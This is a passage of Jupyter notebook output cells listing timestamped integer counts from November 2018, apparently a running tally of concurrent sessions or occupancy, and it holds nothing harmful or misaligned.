"['2018-11-26 13:08:48.972371', 11]\n",
"['2018-11-26 13:08:53.581064', 12]\n",
"['2018-11-26 13:08:55.892616', 13]\n",
"['2018-11-26 13:08:57.626457', 14]\n",
"['2018-11-26 13:09:33.259279', 13]\n",
"['2018-11-26 13:09:38.570612', 12]\n",
"['2018-11-26 13:09:43.200935', 13]\n",
"['2018-11-26 13:10:55.702116', 12]\n",
"['2018-11-26 13:11:35.747746', 11]\n",
"['2018-11-26 13:11:53.558118', 10]\n",
"['2018-11-26 13:13:42.929362', 11]\n",
"['2018-11-26 13:13:45.834626', 10]\n",
"['2018-11-26 13:13:55.843646', 8]\n",
"['2018-11-26 13:14:00.569483', 7]\n",
"['2018-11-26 13:14:23.808890', 8]\n",
"['2018-11-26 13:14:41.070409', 9]\n",
"['2018-11-26 13:15:18.793210', 10]\n",
"['2018-11-26 13:15:20.153024', 11]\n",
"['2018-11-26 13:15:27.846111', 12]\n",
"['2018-11-26 13:16:27.096451', 13]\n",
"['2018-11-26 13:17:05.978278', 12]\n",
"['2018-11-26 13:17:16.653089', 11]\n",
"['2018-11-26 13:17:17.736000', 10]\n",
"['2018-11-26 13:17:36.009108', 9]\n",
"['2018-11-26 13:17:46.019015', 8]\n",
"['2018-11-26 13:18:10.771987', 9]\n",
"['2018-11-26 13:18:19.560688', 10]\n",
"['2018-11-26 13:18:23.075582', 11]\n",
"['2018-11-26 13:18:27.720385', 12]\n",
"['2018-11-26 13:18:36.626556', 13]\n",
"['2018-11-26 13:19:41.953037', 14]\n",
"['2018-11-26 13:21:03.013757', 13]\n",
"['2018-11-26 13:22:44.828687', 9]\n",
"['2018-11-26 13:23:03.860373', 8]\n",
"['2018-11-26 13:23:22.014011', 7]\n",
"['2018-11-26 13:25:42.079596', 3]\n",
"['2018-11-26 13:25:44.681821', 4]\n",
"['2018-11-26 13:27:07.041518', 5]\n",
"['2018-11-26 13:27:11.446570', 6]\n",
"['2018-11-26 13:27:25.066770', 5]\n",
"['2018-11-26 13:28:09.190760', 6]\n",
"['2018-11-26 13:30:03.580856', 7]\n",
"['2018-11-26 13:33:00.246677', 6]\n",
"['2018-11-26 13:34:30.857353', 5]\n",
"['2018-11-26 13:35:16.190170', 3]\n",
"['2018-11-26 13:36:46.855833', 2]\n",
"['2018-11-26 13:37:32.188639', 1]\n",
"['2018-11-26 13:37:41.038556', 2]\n",
"['2018-11-26 13:38:17.272620', 3]\n",
"['2018-11-26 13:38:23.547101', 4]\n",
"['2018-11-26 13:40:33.677097', 5]\n",
"['2018-11-26 13:40:57.232066', 6]\n",
"['2018-11-26 13:43:05.020709', 7]\n",
"['2018-11-26 13:44:48.341371', 6]\n",
"['2018-11-26 13:46:15.899512', 7]\n",
"['2018-11-26 13:47:17.044976', 8]\n",
"['2018-11-26 13:47:22.050330', 9]\n",
"['2018-11-26 13:50:02.025647', 10]\n",
"['2018-11-26 13:50:17.609537', 11]\n",
"['2018-11-26 13:50:56.276796', 12]\n",
"['2018-11-26 13:52:50.527094', 13]\n",
"['2018-11-26 13:53:11.375395', 14]\n",
"['2018-11-26 13:53:11.396279', 15]\n",
"['2018-11-26 13:53:23.782439', 14]\n",
"['2018-11-26 13:53:43.041888', 15]\n",
"['2018-11-26 13:53:50.542881', 16]\n",
"['2018-11-26 13:53:52.403211', 17]\n",
"['2018-11-26 13:54:19.108588', 16]\n",
"['2018-11-26 13:54:59.059526', 17]\n",
"['2018-11-26 13:55:10.832737', 16]\n",
"['2018-11-26 13:55:14.976658', 15]\n",
"['2018-11-26 13:55:23.004877', 16]\n",
"['2018-11-26 13:55:24.667720', 17]\n",
"['2018-11-26 13:55:30.294838', 18]\n",
"['2018-11-26 13:55:31.284889', 19]\n",
"['2018-11-26 13:55:36.285520', 20]\n",
"['2018-11-26 13:55:57.603779', 21]\n",
"['2018-11-26 13:56:11.573552', 20]\n",
"['2018-11-26 13:57:04.758981', 19]\n",
"['2018-11-26 13:57:09.903305', 20]\n",
"['2018-11-26 13:57:26.409987', 21]\n",
"['2018-11-26 13:57:43.065762', 20]\n",
"['2018-11-26 13:57:53.989901', 19]\n",
"['2018-11-26 13:58:23.440580', 20]\n",
"['2018-11-26 13:59:20.437298', 21]\n",
"['2018-11-26 13:59:25.699513', 19]\n",
"['2018-11-26 13:59:27.354537', 20]\n",
"['2018-11-26 13:59:29.145894', 19]\n",
"['2018-11-26 13:59:40.335446', 17]\n",
"['2018-11-26 14:01:25.799571', 14]\n",
"['2018-11-26 14:02:26.312369', 13]\n",
"['2018-11-26 14:02:32.484117', 11]\n",
"['2018-11-26 14:02:53.737089', 10]\n",
"['2018-11-26 14:03:13.049472', 9]\n",
"['2018-11-26 14:03:57.345920', 8]\n",
"['2018-11-26 14:04:56.952897', 9]\n",
"['2018-11-26 14:06:00.226685', 7]\n",
"['2018-11-26 14:07:05.632494', 8]\n",
"['2018-11-26 14:07:56.940761', 7]\n",
"['2018-11-26 14:08:41.937867', 6]\n",
"['2018-11-26 14:10:28.246256', 7]\n",
"['2018-11-26 14:11:04.526793', 5]\n",
"['2018-11-26 14:12:05.437147', 4]\n",
"['2018-11-26 14:13:06.476958', 2]\n",
"['2018-11-26 14:16:35.665579', 3]\n",
"['2018-11-26 14:21:01.421502', 2]\n",
"['2018-11-26 14:21:24.287376', 3]\n",
"['2018-11-26 14:25:52.574082', 2]\n",
"['2018-11-26 14:31:20.762057', 3]\n",
"['2018-11-26 14:33:57.138860', 4]\n",
"['2018-11-26 14:35:40.353880', 3]\n",
"['2018-11-26 14:36:19.076594', 4]\n",
"['2018-11-26 14:38:13.093607', 3]\n",
"['2018-11-26 14:40:00.152006', 4]\n",
"['2018-11-26 14:41:46.777591', 3]\n",
"['2018-11-26 14:41:49.004522', 4]\n",
"['2018-11-26 14:42:21.106162', 5]\n",
"['2018-11-26 14:45:33.284924', 6]\n",
"['2018-11-26 14:45:51.397560', 5]\n",
"['2018-11-26 14:46:41.779043', 4]\n",
"['2018-11-26 14:46:54.475490', 5]\n",
"['2018-11-26 14:47:22.133482', 6]\n",
"['2018-11-26 14:49:46.512014', 7]\n",
"['2018-11-26 14:50:20.768264', 8]\n",
"['2018-11-26 14:51:12.542278', 7]\n",
"['2018-11-26 14:52:23.173456', 6]\n",
"['2018-11-26 14:52:24.126236', 7]\n",
"['2018-11-26 14:52:26.108921', 8]\n",
"['2018-11-26 14:52:39.053833', 7]\n",
"['2018-11-26 14:52:52.710916', 8]\n",
"['2018-11-26 14:52:56.170685', 9]\n",
"['2018-11-26 14:54:38.062657', 8]\n",
"['2018-11-26 14:54:53.787829', 6]\n",
"['2018-11-26 14:54:54.198621', 7]\n",
"['2018-11-26 14:55:19.903858', 8]\n",
"['2018-11-26 14:56:20.786234', 9]\n",
"['2018-11-26 14:56:21.947480', 10]\n",
"['2018-11-26 14:56:56.321481', 9]\n",
"['2018-11-26 14:57:26.344312', 8]\n",
"['2018-11-26 14:58:25.625883', 9]\n",
"['2018-11-26 14:59:00.627904', 8]\n",
"['2018-11-26 14:59:03.135518', 9]\n",
"['2018-11-26 15:00:16.498342', 8]\n",
"['2018-11-26 15:00:21.564344', 7]\n",
"['2018-11-26 15:00:23.656312', 6]\n",
"['2018-11-26 15:00:29.506634', 5]\n",
"['2018-11-26 15:01:24.123272', 6]\n",
"['2018-11-26 15:01:54.804104', 7]\n",
"['2018-11-26 15:04:17.368244', 5]\n",
"['2018-11-26 15:05:26.750819', 4]\n",
"['2018-11-26 15:06:06.792279', 2]\n",
"['2018-11-26 15:19:16.567125', 1]\n",
"['2018-11-26 15:19:23.502743', 2]\n",
"['2018-11-26 15:36:03.036309', 1]\n",
"['2018-11-26 15:36:54.345654', 2]\n",
"['2018-11-26 15:42:29.502750', 3]\n",
"['2018-11-26 15:43:08.147245', 4]\n",
"['2018-11-26 15:47:07.883621', 5]\n",
"['2018-11-26 15:51:41.686499', 6]\n",
"['2018-11-26 15:52:35.834695', 7]\n",
"['2018-11-26 15:52:38.722938', 8]\n",
"['2018-11-26 15:53:25.116370', 9]\n",
"['2018-11-26 15:53:48.563326', 10]\n",
"['2018-11-26 15:53:57.255853', 11]\n",
"['2018-11-26 15:54:04.284745', 12]\n",
"['2018-11-26 15:54:33.079500', 11]\n",
"['2018-11-26 15:55:06.961151', 12]\n",
"['2018-11-26 15:55:45.712544', 11]\n",
"['2018-11-26 15:56:37.505036', 10]\n",
"['2018-11-26 15:57:30.677524', 11]\n",
"['2018-11-26 15:58:03.504671', 10]\n",
"['2018-11-26 15:58:33.382373', 11]\n",
"['2018-11-26 15:58:34.836461', 10]\n",
"['2018-11-26 15:58:52.788942', 9]\n",
"['2018-11-26 15:59:07.582624', 8]\n",
"['2018-11-26 15:59:57.888755', 9]\n",
"['2018-11-26 16:00:01.134266', 10]\n",
"['2018-11-26 16:00:07.122559', 11]\n",
"['2018-11-26 16:00:24.128252', 12]\n",
"['2018-11-26 16:00:27.878243', 13]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 16:00:32.586298', 14]\n",
"['2018-11-26 16:00:34.246802', 13]\n",
"['2018-11-26 16:00:40.654788', 12]\n",
"['2018-11-26 16:00:41.408267', 13]\n",
"['2018-11-26 16:00:58.297598', 14]\n",
"['2018-11-26 16:01:41.503736', 13]\n",
"['2018-11-26 16:01:47.036706', 14]\n",
"['2018-11-26 16:02:07.831331', 15]\n",
"['2018-11-26 16:02:40.515343', 16]\n",
"['2018-11-26 16:03:15.285110', 15]\n",
"['2018-11-26 16:03:17.733844', 16]\n",
"['2018-11-26 16:03:37.770085', 15]\n",
"['2018-11-26 16:03:58.304200', 14]\n",
"['2018-11-26 16:04:05.594700', 13]\n",
"['2018-11-26 16:04:17.089116', 12]\n",
"['2018-11-26 16:04:58.303106', 9]\n",
"['2018-11-26 16:06:27.494524', 10]\n",
"['2018-11-26 16:07:05.219638', 8]\n",
"['2018-11-26 16:07:24.036252', 7]\n",
"['2018-11-26 16:08:16.548292', 8]\n",
"['2018-11-26 16:09:04.200328', 9]\n",
"['2018-11-26 16:09:08.757684', 10]\n",
"['2018-11-26 16:09:25.910733', 11]\n",
"['2018-11-26 16:09:53.447826', 10]\n",
"['2018-11-26 16:10:00.382839', 11]\n",
"['2018-11-26 16:10:31.604311', 12]\n",
"['2018-11-26 16:12:48.249093', 11]\n",
"['2018-11-26 16:13:07.828945', 10]\n",
"['2018-11-26 16:13:49.559096', 8]\n",
"['2018-11-26 16:14:00.894203', 7]\n",
"['2018-11-26 16:14:01.847198', 8]\n",
"['2018-11-26 16:14:08.868716', 7]\n",
"['2018-11-26 16:14:25.652691', 6]\n",
"['2018-11-26 16:14:43.912848', 5]\n",
"['2018-11-26 16:16:05.419674', 6]\n",
"['2018-11-26 16:18:24.225368', 5]\n",
"['2018-11-26 16:18:37.139351', 6]\n",
"['2018-11-26 16:19:18.375476', 7]\n",
"['2018-11-26 16:20:08.685577', 6]\n",
"['2018-11-26 16:20:39.778816', 5]\n",
"['2018-11-26 16:24:12.157780', 4]\n",
"['2018-11-26 16:27:57.495888', 5]\n",
"['2018-11-26 16:29:22.661158', 4]\n",
"['2018-11-26 16:30:35.550558', 5]\n",
"['2018-11-26 16:30:47.718913', 4]\n",
"['2018-11-26 16:40:26.445803', 1]\n",
"['2018-11-26 16:42:03.442460', 2]\n",
"['2018-11-26 16:48:47.901941', 3]\n",
"['2018-11-26 16:49:58.944754', 4]\n",
"['2018-11-26 16:54:59.531497', 5]\n",
"['2018-11-26 16:57:15.927984', 6]\n",
"['2018-11-26 16:57:52.488521', 5]\n",
"['2018-11-26 16:58:06.780750', 6]\n",
"['2018-11-26 16:58:13.211950', 7]\n",
"['2018-11-26 16:58:13.498243', 8]\n",
"['2018-11-26 16:58:18.431692', 9]\n",
"['2018-11-26 16:59:00.022707', 8]\n",
"['2018-11-26 16:59:08.022127', 9]\n",
"['2018-11-26 16:59:17.203616', 10]\n",
"['2018-11-26 16:59:28.495834', 11]\n",
"['2018-11-26 16:59:30.485016', 12]\n",
"['2018-11-26 16:59:40.988254', 13]\n",
"['2018-11-26 16:59:56.937562', 14]\n",
"['2018-11-26 17:00:00.018869', 15]\n",
"['2018-11-26 17:00:41.455267', 16]\n",
"['2018-11-26 17:01:08.495224', 15]\n",
"['2018-11-26 17:02:08.536295', 14]\n",
"['2018-11-26 17:02:09.830105', 15]\n",
"['2018-11-26 17:02:23.547516', 16]\n",
"['2018-11-26 17:02:39.602904', 15]\n",
"['2018-11-26 17:03:33.310818', 13]\n",
"['2018-11-26 17:03:42.618225', 14]\n",
"['2018-11-26 17:04:04.912515', 13]\n",
"['2018-11-26 17:04:41.692216', 12]\n",
"['2018-11-26 17:04:46.213522', 10]\n",
"['2018-11-26 17:04:46.258007', 11]\n",
"['2018-11-26 17:06:13.938987', 10]\n",
"['2018-11-26 17:06:31.119573', 11]\n",
"['2018-11-26 17:06:41.398407', 12]\n",
"['2018-11-26 17:07:32.719215', 13]\n",
"['2018-11-26 17:07:50.933944', 12]\n",
"['2018-11-26 17:08:50.916344', 11]\n",
"['2018-11-26 17:10:15.920733', 9]\n",
"['2018-11-26 17:11:13.119804', 7]\n",
"['2018-11-26 17:11:57.651672', 6]\n",
"['2018-11-26 17:12:12.406664', 5]\n",
"['2018-11-26 17:12:39.636695', 4]\n",
"['2018-11-26 17:12:57.444370', 5]\n",
"['2018-11-26 17:13:06.754543', 6]\n",
"['2018-11-26 17:13:14.999598', 7]\n",
"['2018-11-26 17:13:22.935542', 8]\n",
"['2018-11-26 17:13:53.571789', 7]\n",
"['2018-11-26 17:14:09.374983', 6]\n",
"['2018-11-26 17:14:34.470999', 7]\n",
"['2018-11-26 17:14:41.552283', 8]\n",
"['2018-11-26 17:15:06.655755', 9]\n",
"['2018-11-26 17:16:57.621602', 8]\n",
"['2018-11-26 17:17:08.114188', 7]\n",
"['2018-11-26 17:17:34.757907', 8]\n",
"['2018-11-26 17:17:49.912753', 7]\n",
"['2018-11-26 17:18:19.507567', 8]\n",
"['2018-11-26 17:18:29.337409', 9]\n",
"['2018-11-26 17:19:19.578695', 10]\n",
"['2018-11-26 17:22:18.304052', 5]\n",
"['2018-11-26 17:23:49.651941', 2]\n",
"['2018-11-26 17:28:49.588609', 3]\n",
"['2018-11-26 17:35:50.997339', 1]\n",
"['2018-11-26 17:39:07.446273', 2]\n",
"['2018-11-26 17:40:02.651883', 3]\n",
"['2018-11-26 17:40:19.699399', 4]\n",
"['2018-11-26 17:40:28.278682', 3]\n",
"['2018-11-26 17:40:35.433526', 4]\n",
"['2018-11-26 17:42:28.649766', 5]\n",
"['2018-11-26 17:44:10.317259', 4]\n",
"['2018-11-26 17:45:33.734095', 5]\n",
"['2018-11-26 17:45:47.124891', 6]\n",
"['2018-11-26 17:46:27.706233', 7]\n",
"['2018-11-26 17:46:30.193987', 6]\n",
"['2018-11-26 17:47:22.452563', 5]\n",
"['2018-11-26 17:48:45.063840', 6]\n",
"['2018-11-26 17:49:30.886193', 7]\n",
"['2018-11-26 17:51:29.826930', 8]\n",
"['2018-11-26 17:51:51.447832', 9]\n",
"['2018-11-26 17:52:57.167304', 10]\n",
"['2018-11-26 17:54:55.913193', 11]\n",
"['2018-11-26 17:55:22.140838', 12]\n",
"['2018-11-26 17:56:06.650561', 13]\n",
"['2018-11-26 17:56:17.427700', 14]\n",
"['2018-11-26 17:56:46.213254', 15]\n",
"['2018-11-26 17:57:05.059725', 14]\n",
"['2018-11-26 17:57:14.231065', 15]\n",
"['2018-11-26 17:58:51.141065', 14]\n",
"['2018-11-26 17:59:02.785519', 13]\n",
"['2018-11-26 17:59:15.126939', 12]\n",
"['2018-11-26 18:00:00.147366', 13]\n",
"['2018-11-26 18:00:19.211082', 12]\n",
"['2018-11-26 18:00:28.049954', 11]\n",
"['2018-11-26 18:00:33.916684', 12]\n",
"['2018-11-26 18:00:47.612453', 10]\n",
"['2018-11-26 18:01:20.158215', 8]\n",
"['2018-11-26 18:02:01.367023', 9]\n",
"['2018-11-26 18:03:05.338809', 8]\n",
"['2018-11-26 18:03:31.125564', 9]\n",
"['2018-11-26 18:03:40.031733', 10]\n",
"['2018-11-26 18:03:47.078879', 9]\n",
"['2018-11-26 18:04:08.686099', 8]\n",
"['2018-11-26 18:04:22.722725', 9]\n",
"['2018-11-26 18:04:30.962230', 8]\n",
"['2018-11-26 18:04:49.543915', 7]\n",
"['2018-11-26 18:06:10.951989', 6]\n",
"['2018-11-26 18:06:34.956877', 5]\n",
"['2018-11-26 18:07:23.828994', 6]\n",
"['2018-11-26 18:07:33.600887', 5]\n",
"['2018-11-26 18:07:50.395303', 4]\n",
"['2018-11-26 18:09:53.194624', 5]\n",
"['2018-11-26 18:10:00.215393', 6]\n",
"['2018-11-26 18:10:00.959590', 7]\n",
"['2018-11-26 18:10:06.488325', 8]\n",
"['2018-11-26 18:10:09.662131', 9]\n",
"['2018-11-26 18:12:59.065272', 8]\n",
"['2018-11-26 18:14:30.086369', 6]\n",
"['2018-11-26 18:15:00.267873', 4]\n",
"['2018-11-26 18:15:30.318097', 2]\n",
"['2018-11-26 18:16:00.508036', 1]\n",
"['2018-11-26 18:16:14.092464', 2]\n",
"['2018-11-26 18:17:14.175659', 3]\n",
"['2018-11-26 18:20:16.647374', 2]\n",
"['2018-11-26 18:26:05.223754', 1]\n",
"['2018-11-26 18:26:49.242475', 2]\n",
"['2018-11-26 18:33:34.998059', 1]\n",
"['2018-11-26 18:54:05.874057', 2]\n",
"['2018-11-26 18:54:11.859313', 3]\n",
"['2018-11-26 18:54:21.577699', 4]\n",
"['2018-11-26 18:55:30.643638', 5]\n",
"['2018-11-26 18:55:39.192621', 6]\n",
"['2018-11-26 18:56:00.062118', 5]\n",
"['2018-11-26 18:56:20.475766', 6]\n",
"['2018-11-26 18:56:22.599995', 7]\n",
"['2018-11-26 18:56:31.718128', 8]\n",
"['2018-11-26 18:56:35.713651', 9]\n",
"['2018-11-26 18:56:57.308283', 10]\n",
"['2018-11-26 18:58:24.892806', 9]\n",
"['2018-11-26 18:59:25.616790', 10]\n",
"['2018-11-26 19:00:20.034095', 8]\n",
"['2018-11-26 19:00:32.999081', 6]\n",
"['2018-11-26 19:01:34.249792', 4]\n",
"['2018-11-26 19:03:04.517173', 5]\n",
"['2018-11-26 19:03:29.259812', 4]\n",
"['2018-11-26 19:04:03.281354', 5]\n",
"['2018-11-26 19:06:38.346350', 6]\n",
"['2018-11-26 19:07:16.169284', 5]\n",
"['2018-11-26 19:08:37.736541', 4]\n",
"['2018-11-26 19:08:54.176230', 3]\n",
"['2018-11-26 19:09:34.402394', 4]\n",
"['2018-11-26 19:14:01.886456', 3]\n",
"['2018-11-26 19:14:07.998163', 4]\n",
"['2018-11-26 19:14:28.538077', 5]\n",
"['2018-11-26 19:17:31.327316', 6]\n",
"['2018-11-26 19:17:41.774637', 7]\n",
"['2018-11-26 19:18:20.966497', 6]\n",
"['2018-11-26 19:21:10.229772', 5]\n",
"['2018-11-26 19:21:40.991474', 4]\n",
"['2018-11-26 19:22:12.083850', 3]\n",
"['2018-11-26 19:24:26.791208', 4]\n",
"['2018-11-26 19:36:46.481954', 1]\n",
"['2018-11-26 19:37:25.130915', 2]\n",
"['2018-11-26 19:41:23.451054', 3]\n",
"['2018-11-26 19:41:25.290839', 2]\n",
"['2018-11-26 19:46:38.200424', 3]\n",
"['2018-11-26 19:46:49.880188', 4]\n",
"['2018-11-26 19:51:09.901304', 3]\n",
"['2018-11-26 19:51:21.792572', 4]\n",
"['2018-11-26 19:51:24.975841', 5]\n",
"['2018-11-26 19:52:33.592335', 3]\n",
"['2018-11-26 19:52:38.625433', 4]\n",
"['2018-11-26 19:53:53.860642', 5]\n",
"['2018-11-26 19:56:13.377007', 4]\n",
"['2018-11-26 19:58:40.101500', 3]\n",
"['2018-11-26 20:01:25.133868', 4]\n",
"['2018-11-26 20:04:07.865345', 5]\n",
"['2018-11-26 20:04:46.973280', 6]\n",
"['2018-11-26 20:04:58.241546', 7]\n",
"['2018-11-26 20:05:50.314991', 8]\n",
"['2018-11-26 20:07:24.913099', 9]\n",
"['2018-11-26 20:08:19.391311', 7]\n",
"['2018-11-26 20:08:54.694858', 6]\n",
"['2018-11-26 20:09:23.299211', 7]\n",
"['2018-11-26 20:09:26.504385', 6]\n",
"['2018-11-26 20:16:15.875729', 5]\n",
"['2018-11-26 20:16:48.749983', 4]\n",
"['2018-11-26 20:20:43.880375', 3]\n",
"['2018-11-26 20:22:45.228484', 2]\n",
"['2018-11-26 20:24:56.133052', 3]\n",
"['2018-11-26 20:27:11.207083', 4]\n",
"['2018-11-26 20:28:34.190531', 5]\n",
"['2018-11-26 20:28:34.193930', 6]\n",
"['2018-11-26 20:30:01.508970', 5]\n",
"['2018-11-26 20:30:22.959211', 4]\n",
"['2018-11-26 20:30:56.214479', 5]\n",
"['2018-11-26 20:31:05.226929', 4]\n",
"['2018-11-26 20:33:59.318390', 3]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 20:34:32.498158', 2]\n",
"['2018-11-26 20:41:40.621048', 1]\n",
"['2018-11-26 20:47:30.809413', 2]\n",
"['2018-11-26 20:47:35.138889', 3]\n",
"['2018-11-26 20:48:01.919936', 4]\n",
"['2018-11-26 20:49:30.244451', 5]\n",
"['2018-11-26 20:55:39.457039', 1]\n",
"['2018-11-22 05:36:22.948006', 2]\n",
"['2018-11-22 05:36:24.606504', 3]\n",
"['2018-11-22 05:36:24.896547', 4]\n",
"['2018-11-22 05:36:26.042057', 5]\n",
"['2018-11-22 05:36:34.765252', 6]\n",
"['2018-11-22 05:48:06.157088', 2]\n",
"['2018-11-22 05:52:28.364529', 3]\n",
"['2018-11-22 05:54:30.020330', 2]\n",
"['2018-11-22 05:57:17.310538', 3]\n",
"['2018-11-22 05:57:20.195659', 4]\n",
"['2018-11-22 05:59:01.015544', 5]\n",
"['2018-11-22 06:01:20.153108', 4]\n",
"['2018-11-22 06:01:56.228755', 5]\n",
"['2018-11-22 06:02:00.614523', 6]\n",
"['2018-11-22 06:03:01.919837', 5]\n",
"['2018-11-22 06:03:09.130654', 6]\n",
"['2018-11-22 06:04:00.648205', 7]\n",
"['2018-11-22 06:05:31.341073', 8]\n",
"['2018-11-22 06:06:33.538659', 7]\n",
"['2018-11-22 06:08:03.395835', 6]\n",
"['2018-11-22 06:08:09.208339', 7]\n",
"['2018-11-22 06:08:48.255792', 6]\n",
"['2018-11-22 06:08:53.884531', 7]\n",
"['2018-11-22 06:11:18.210570', 8]\n",
"['2018-11-22 06:12:22.982068', 7]\n",
"['2018-11-22 06:13:02.794211', 6]\n",
"['2018-11-22 06:14:20.188301', 7]\n",
"['2018-11-22 06:14:36.014728', 8]\n",
"['2018-11-22 06:15:13.943570', 9]\n",
"['2018-11-22 06:15:18.491987', 8]\n",
"['2018-11-22 06:16:38.108064', 9]\n",
"['2018-11-22 06:17:49.407704', 10]\n",
"['2018-11-22 06:19:04.602977', 9]\n",
"['2018-11-22 06:19:24.359092', 8]\n",
"['2018-11-22 06:22:33.516648', 7]\n",
"['2018-11-22 06:23:14.674829', 8]\n",
"['2018-11-22 06:26:13.921884', 9]\n",
"['2018-11-22 06:27:36.757952', 8]\n",
"['2018-11-22 06:30:26.736611', 7]\n",
"['2018-11-22 06:31:00.335886', 6]\n",
"['2018-11-22 06:31:18.120100', 5]\n",
"['2018-11-22 06:47:33.949450', 2]\n",
"['2018-11-22 06:49:59.010088', 3]\n",
"['2018-11-22 06:51:39.710858', 4]\n",
"['2018-11-22 06:51:43.845620', 5]\n",
"['2018-11-22 06:54:15.279763', 4]\n",
"['2018-11-22 06:58:57.351202', 2]\n",
"['2018-11-22 06:59:37.960293', 3]\n",
"['2018-11-22 07:04:03.128448', 2]\n",
"['2018-11-22 07:04:51.770528', 3]\n",
"['2018-11-22 07:04:57.224422', 4]\n",
"['2018-11-22 07:05:02.406502', 5]\n",
"['2018-11-22 07:07:13.848749', 6]\n",
"['2018-11-22 07:07:45.360927', 7]\n",
"['2018-11-22 07:08:09.362668', 6]\n",
"['2018-11-22 07:09:09.116956', 7]\n",
"['2018-11-22 07:09:36.074241', 8]\n",
"['2018-11-22 07:11:25.056447', 7]\n",
"['2018-11-22 07:11:47.601569', 8]\n",
"['2018-11-22 07:13:29.135235', 7]\n",
"['2018-11-22 07:14:23.682347', 8]\n",
"['2018-11-22 07:15:00.687651', 7]\n",
"['2018-11-22 07:15:29.566889', 8]\n",
"['2018-11-22 07:15:36.150793', 9]\n",
"['2018-11-22 07:15:49.653352', 8]\n",
"['2018-11-22 07:16:51.978786', 9]\n",
"['2018-11-22 07:16:59.058449', 8]\n",
"['2018-11-22 07:17:30.318946', 7]\n",
"['2018-11-22 07:17:52.500664', 8]\n",
"['2018-11-22 07:19:36.415105', 7]\n",
"['2018-11-22 07:19:53.655418', 6]\n",
"['2018-11-22 07:20:14.930740', 5]\n",
"['2018-11-22 07:20:36.289670', 6]\n",
"['2018-11-22 07:22:28.465913', 7]\n",
"['2018-11-22 07:22:41.472842', 8]\n",
"['2018-11-22 07:22:48.001065', 9]\n",
"['2018-11-22 07:22:50.310019', 10]\n",
"['2018-11-22 07:22:51.492472', 11]\n",
"['2018-11-22 07:23:39.992625', 10]\n",
"['2018-11-22 07:24:32.541292', 11]\n",
"['2018-11-22 07:24:57.960234', 10]\n",
"['2018-11-22 07:25:01.878533', 11]\n",
"['2018-11-22 07:26:35.473517', 10]\n",
"['2018-11-22 07:27:08.025622', 7]\n",
"['2018-11-22 07:28:54.254474', 6]\n",
"['2018-11-22 07:29:33.385135', 5]\n",
"['2018-11-22 07:31:32.725074', 4]\n",
"['2018-11-22 07:34:08.579663', 3]\n",
"['2018-11-22 07:35:07.195398', 4]\n",
"['2018-11-22 07:37:11.825844', 3]\n",
"['2018-11-22 07:38:04.226311', 4]\n",
"['2018-11-22 07:43:26.005319', 2]\n",
"['2018-11-22 07:46:19.776044', 3]\n",
"['2018-11-22 07:51:38.241250', 2]\n",
"['2018-11-22 07:54:02.041374', 3]\n",
"['2018-11-22 07:55:28.253209', 4]\n",
"['2018-11-22 07:57:45.318927', 5]\n",
"['2018-11-22 07:58:25.689337', 6]\n",
"['2018-11-22 07:58:39.873207', 7]\n",
"['2018-11-22 07:58:57.419278', 8]\n",
"['2018-11-22 07:59:28.333418', 7]\n",
"['2018-11-22 07:59:33.631922', 8]\n",
"['2018-11-22 07:59:56.705863', 9]\n",
"['2018-11-22 08:00:25.503721', 10]\n",
"['2018-11-22 08:00:37.402659', 11]\n",
"['2018-11-22 08:00:52.374210', 10]\n",
"['2018-11-22 08:01:12.823579', 11]\n",
"['2018-11-22 08:01:29.890628', 12]\n",
"['2018-11-22 08:01:38.731648', 13]\n",
"['2018-11-22 08:04:21.534176', 12]\n",
"['2018-11-22 08:05:46.401172', 13]\n",
"['2018-11-22 08:06:06.700793', 12]\n",
"['2018-11-22 08:07:06.720930', 11]\n",
"['2018-11-22 08:07:10.717080', 12]\n",
"['2018-11-22 08:07:25.215816', 13]\n",
"['2018-11-22 08:07:52.742588', 14]\n",
"['2018-11-22 08:08:02.889077', 13]\n",
"['2018-11-22 08:08:23.169771', 14]\n",
"['2018-11-22 08:08:28.546416', 15]\n",
"['2018-11-22 08:09:02.220303', 16]\n",
"['2018-11-22 08:09:20.085487', 15]\n",
"['2018-11-22 08:09:47.871562', 14]\n",
"['2018-11-22 08:12:10.649490', 15]\n",
"['2018-11-22 08:12:18.415647', 16]\n",
"['2018-11-22 08:12:24.190079', 15]\n",
"['2018-11-22 08:12:59.152077', 16]\n",
"['2018-11-22 08:13:04.782801', 15]\n",
"['2018-11-22 08:13:15.664286', 16]\n",
"['2018-11-22 08:13:25.618877', 15]\n",
"['2018-11-22 08:13:28.025036', 16]\n",
"['2018-11-22 08:13:39.472095', 17]\n",
"['2018-11-22 08:13:45.212441', 18]\n",
"['2018-11-22 08:13:47.018444', 19]\n",
"['2018-11-22 08:13:47.615678', 20]\n",
"['2018-11-22 08:13:58.144571', 21]\n",
"['2018-11-22 08:16:22.183356', 20]\n",
"['2018-11-22 08:16:27.649819', 19]\n",
"['2018-11-22 08:16:30.993300', 20]\n",
"['2018-11-22 08:16:56.182282', 21]\n",
"['2018-11-22 08:17:51.672429', 19]\n",
"['2018-11-22 08:18:01.044288', 18]\n",
"['2018-11-22 08:18:08.114304', 19]\n",
"['2018-11-22 08:18:19.064484', 17]\n",
"['2018-11-22 08:18:23.148826', 16]\n",
"['2018-11-22 08:18:24.440749', 17]\n",
"['2018-11-22 08:18:38.993868', 18]\n",
"['2018-11-22 08:19:03.005989', 19]\n",
"['2018-11-22 08:19:21.638160', 18]\n",
"['2018-11-22 08:19:29.847270', 17]\n",
"['2018-11-22 08:19:30.760954', 18]\n",
"['2018-11-22 08:19:38.798179', 17]\n",
"['2018-11-22 08:19:53.570782', 18]\n",
"['2018-11-22 08:20:16.412355', 19]\n",
"['2018-11-22 08:20:31.907697', 18]\n",
"['2018-11-22 08:20:56.359296', 17]\n",
"['2018-11-22 08:21:09.573560', 16]\n",
"['2018-11-22 08:21:10.571850', 17]\n",
"['2018-11-22 08:21:18.971194', 18]\n",
"['2018-11-22 08:21:27.797604', 19]\n",
"['2018-11-22 08:21:33.268092', 18]\n",
"['2018-11-22 08:21:49.407778', 19]\n",
"['2018-11-22 08:22:34.995067', 17]\n",
"['2018-11-22 08:23:00.378369', 16]\n",
"['2018-11-22 08:23:13.025707', 15]\n",
"['2018-11-22 08:23:16.016078', 16]\n",
"['2018-11-22 08:24:58.261099', 17]\n",
"['2018-11-22 08:25:06.809851', 18]\n",
"['2018-11-22 08:25:17.695544', 16]\n",
"['2018-11-22 08:25:24.971470', 15]\n",
